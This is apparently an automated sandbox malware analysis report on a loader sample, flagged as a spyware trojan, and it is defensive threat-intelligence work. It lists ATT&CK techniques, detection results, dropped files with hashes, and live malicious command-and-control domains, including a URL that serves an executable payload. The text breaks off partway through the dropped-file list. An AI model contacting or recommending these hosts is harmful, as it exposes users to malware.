                          Clipboard Data                          		Protocol ImpersonationTraffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading                          		LSA Secrets23
                          Virtualization/Sandbox Evasion                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          Masquerading                          		Cached Domain Credentials1
                          Process Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items23
                          Virtualization/Sandbox Evasion                          		DCSync1
                          Application Window Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                          Process Injection                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          R3nz_Loader.exe34%ReversingLabsWin32.Dropper.Genie
                          R3nz_Loader.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Roaming\gdi32.dll100%Joe Sandbox ML

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://fancywaxxers.shop/YB100%Avira URL Cloudmalware
                          rabidcowse.shop100%Avira URL Cloudmalware
                          wholersorie.shop100%Avira URL Cloudmalware
                          https://fancywaxxers.shop/api9Bd100%Avira URL Cloudmalware
                          https://fancywaxxers.shop/api_100%Avira URL Cloudmalware
                          fancywaxxers.shop100%Avira URL Cloudmalware
                          https://fancywaxxers.shop/apiAB100%Avira URL Cloudmalware
                          cloudewahsj.shop100%Avira URL Cloudmalware
                          http://147.45.47.81/conhost.exe0%Avira URL Cloudsafe
                          https://fancywaxxers.shop/X100%Avira URL Cloudmalware
                          noisycuttej.shop100%Avira URL Cloudmalware
                          https://fancywaxxers.shop/int32100%Avira URL Cloudmalware
                          https://fancywaxxers.shop/api100%Avira URL Cloudmalware
                          framekgirus.shop100%Avira URL Cloudmalware
                          nearycrepso.shop100%Avira URL Cloudmalware
                          https://fancywaxxers.shop/100%Avira URL Cloudmalware
                          https://fancywaxxers.shop/n100%Avira URL Cloudmalware
                          abruptyopsn.shop100%Avira URL Cloudmalware
                          tirepublicerj.shop100%Avira URL Cloudmalware

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          fancywaxxers.shop
                          		104.21.32.1
                          		truetrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            rabidcowse.shoptrue
                            • Avira URL Cloud: malware
                            		unknown
                            wholersorie.shoptrue
                            • Avira URL Cloud: malware
                            		unknown
                            fancywaxxers.shoptrue
                            • Avira URL Cloud: malware
                            		unknown
                            cloudewahsj.shoptrue
                            • Avira URL Cloud: malware
                            		unknown
                            noisycuttej.shoptrue
                            • Avira URL Cloud: malware
                            		unknown
                            nearycrepso.shoptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://fancywaxxers.shop/apitrue
                            • Avira URL Cloud: malware
                            		unknown
                            framekgirus.shoptrue
                            • Avira URL Cloud: malware
                            		unknown
                            tirepublicerj.shoptrue
                            • Avira URL Cloud: malware
                            		unknown
                            abruptyopsn.shoptrue
                            • Avira URL Cloud: malware
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://fancywaxxers.shop/api_aspnet_regiis.exe, 00000003.00000003.2740892244.0000000002B01000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2140838210.0000000002AFF000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoaspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiaspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.rootca1.amazontrust.com/rootca1.crl0aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://fancywaxxers.shop/Xaspnet_regiis.exe, 00000003.00000003.2063582512.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2064491018.0000000004F34000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://upx.sf.netAmcache.hve.6.drfalse
                                            		high
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://ocsp.rootca1.amazontrust.com0:aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://fancywaxxers.shop/YBaspnet_regiis.exe, 00000003.00000003.2053645205.0000000002B1D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2065068299.0000000002AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://147.45.47.81/conhost.exeaspnet_regiis.exe, 00000003.00000003.2740892244.0000000002B01000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3271562153.0000000002B0F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2140838210.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2140838210.0000000002AFF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2141010359.0000000002B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://fancywaxxers.shop/apiABaspnet_regiis.exe, 00000003.00000002.3271176576.0000000002A6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaaspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-braspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://fancywaxxers.shop/api9Bdaspnet_regiis.exe, 00000003.00000002.3271176576.0000000002A6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://ac.ecosia.org/autocomplete?q=aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgaspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://fancywaxxers.shop/int32aspnet_regiis.exe, 00000003.00000002.3271176576.0000000002A6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgaspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://x1.c.lencr.org/0aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://x1.i.lencr.org/0aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refaspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://fancywaxxers.shop/aspnet_regiis.exe, 00000003.00000003.2100987956.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2053645205.0000000002B1D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3271562153.0000000002B0F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2140838210.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2101109857.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2141010359.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2101077815.0000000002B1D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2065068299.0000000002AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://fancywaxxers.shop/naspnet_regiis.exe, 00000003.00000002.3271176576.0000000002A6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://support.mozilla.org/products/firefoxgro.allaspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            104.21.32.1
                                                                            		fancywaxxers.shopUnited States
                                                                            		13335CLOUDFLARENETUStrue

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1582077
                                                                            Start date and time:2024-12-29 23:36:06 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 5m 52s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:10
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:R3nz_Loader.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@5/7@1/1
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 100%
                                                                            • Number of executed functions: 35
                                                                            • Number of non-executed functions: 61
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.190.160.20, 172.202.163.200, 13.107.246.45
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: R3nz_Loader.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            17:36:54API Interceptor8x Sleep call for process: aspnet_regiis.exe modified
                                                                            17:37:14API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            104.21.32.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                            • redroomaudio.com/administrator/index.php

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            fancywaxxers.shopLoader.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.80.1

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUSLoader.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.80.1
                                                                            BasesRow.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.64.1
                                                                            dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                                                            • 104.26.13.205
                                                                            setup.msiGet hashmaliciousUnknownBrowse
                                                                            • 104.21.0.151
                                                                            installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.208.58
                                                                            EFT Payment_Transcript__Survitecgroup.htmlGet hashmaliciousUnknownBrowse
                                                                            • 104.18.26.193
                                                                            @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                            • 104.21.32.1
                                                                            Lets-x64.exeGet hashmaliciousNitol, ZegostBrowse
                                                                            • 104.21.81.224
                                                                            KL-3.1.16.exeGet hashmaliciousNitol, ZegostBrowse
                                                                            • 104.21.81.224
                                                                            Whyet-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                            • 104.21.81.224

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            a0e9f5d64349fb13191bc781f81f42e1Loader.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.32.1
                                                                            BasesRow.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.32.1
                                                                            installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.32.1
                                                                            @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                            • 104.21.32.1
                                                                            GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                            • 104.21.32.1
                                                                            Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                            • 104.21.32.1
                                                                            MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.32.1
                                                                            rfWu0dUz6A.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.32.1
                                                                            SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                            • 104.21.32.1
                                                                            gdi32.dllGet hashmaliciousLummaCBrowse
                                                                            • 104.21.32.1

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_R3nz_Loader.exe_bec9dbe1b9e61d8d1e53ea540fa1a964513b9dc_3ffa48ab_8809308f-a3f2-4ba9-9fed-4b6a65262092\Report.wer

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9915220411873568
                                                                            Encrypted:false
                                                                            SSDEEP:192:VOR2G+psXkd0BU/KaGtizuiFVZ24IO8qnf5:VfS0eBU/KaRzuiFVY4IO8qnf
                                                                            MD5:582C73688AD6120B54A0A15490D44491
                                                                            SHA1:86DE991BC7B118A29A6F1EA8F480A3B9B04BE2C5
                                                                            SHA-256:22B8D6486860A06E0B0684D4D70540AA7C39113AD190B5326CF459D4101578E8
                                                                            SHA-512:A5ECD95443D1E6FEE88705DB5E8731E282C4530185A5A4FCA1B7E81B6ADDF6BDDD236E568FE000D03EB8627C391850508DF9CF65FAC328F84FE2637913D09B9C
                                                                            Malicious:true
                                                                            Reputation:low
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.9.8.5.4.1.4.2.0.6.0.7.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.9.8.5.4.1.5.7.0.6.0.7.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.8.0.9.3.0.8.f.-.a.3.f.2.-.4.b.a.9.-.9.f.e.d.-.4.b.6.a.6.5.2.6.2.0.9.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.7.0.a.b.e.e.b.-.1.2.2.0.-.4.3.0.c.-.8.b.f.0.-.6.d.1.0.2.f.a.c.c.4.b.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.3.n.z._.L.o.a.d.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.X.e.n.i.a.H.a.r.v.e.y.K.a.i.t.l.y.n...p.d.f.k.W.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.7.c.-.0.0.0.1.-.0.0.1.4.-.e.c.8.7.-.7.d.2.8.4.2.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.a.2.d.5.0.4.e.f.6.2.b.7.2.7.2.1.a.a.b.3.7.1.a.4.7.5.3.f.b.0.9.0.0.0.0.0.0.0.0.!.0.0.0.0.a.7.d.a.0.b.b.d.e.6.2.1.a.7.d.f.3.4.8.9.b.3.9.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C4D.tmp.dmp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 15 streams, Sun Dec 29 22:36:54 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):199358
                                                                            Entropy (8bit):3.3540321673380293
                                                                            Encrypted:false
                                                                            SSDEEP:1536:NRkOrXpN4uE2aO2oLTg/nI+OcGK/yCDwSeCq:NRhT4uEqZLTgvZOcjBwSZ
                                                                            MD5:EB370DF60B9F703129EA6D66425032F2
                                                                            SHA1:49CB1A6A4803AB3658ED4921BC13D1214AB327B6
                                                                            SHA-256:F6C0016BFDC41508E32BB32765651371054AFE58575EADE5EDE8554C804BBA81
                                                                            SHA-512:3F7B6E1C013D9C4A3E6E83B14678692A928D43C55FE05811229458CC436169E96EB8B3BCE0BC6F0416198242687D082F8469FC4501541693A827ECD619E05CEA
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:MDMP..a..... .........qg............D...............X.......$................J..........`.......8...........T...........00..............,............ ..............................................................................eJ....... ......GenuineIntel............T.......|.....qg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D87.tmp.WERInternalMetadata.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8420
                                                                            Entropy (8bit):3.7043608808146935
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJyk6HPT6YEIsSULrcGgmfZRY0prj89bSbsfX8Gm:R6lXJh6HPT6YEDSULAGgmffY1Sgf0
                                                                            MD5:CA53712F30600D7B9BF2DAAB56485E80
                                                                            SHA1:597D3117EBAAC0708A2F22636A9AF4FBCED75A68
                                                                            SHA-256:965953693DB98818DB8EBAF44386F73BF404E60D82B0A9EB089ED947FD29CF53
                                                                            SHA-512:4525BCEFF966C799C88D551A679F423671744CAE479132F1173B8230AE9A30B4241FA706AF86437FFF47DF5A17BC2CD73805A8FD5BB60921EC0748D8E31030A8
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.8.4.<./.P.i.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E15.tmp.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4786
                                                                            Entropy (8bit):4.525371893539953
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsbJg77aI9zQWpW8VY+Ym8M4JB2FW7+q8vkUHV1v4dd:uIjf1I7Jp7V2JR7KJHV1v0d
                                                                            MD5:B2987132B120B907905FA11AEE242C93
                                                                            SHA1:A6F6868D8C23A7DE9434BE44329608AC3ED64D5A
                                                                            SHA-256:D6AE230A4E8A02DA4F55F7522F6FD248577A3C32285589D001F6F6579F319D40
                                                                            SHA-512:A8EDC5DD73860628853D5FB9BEACC547F12600658ECA64D96327EEF534624D78DBD5496EB110473F64026C6C8D3C017B112DA1ACE0337115B97824BBF1E4B1E7
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653139" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                            C:\Users\user\AppData\Roaming\gdi32.dll

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\R3nz_Loader.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):443392
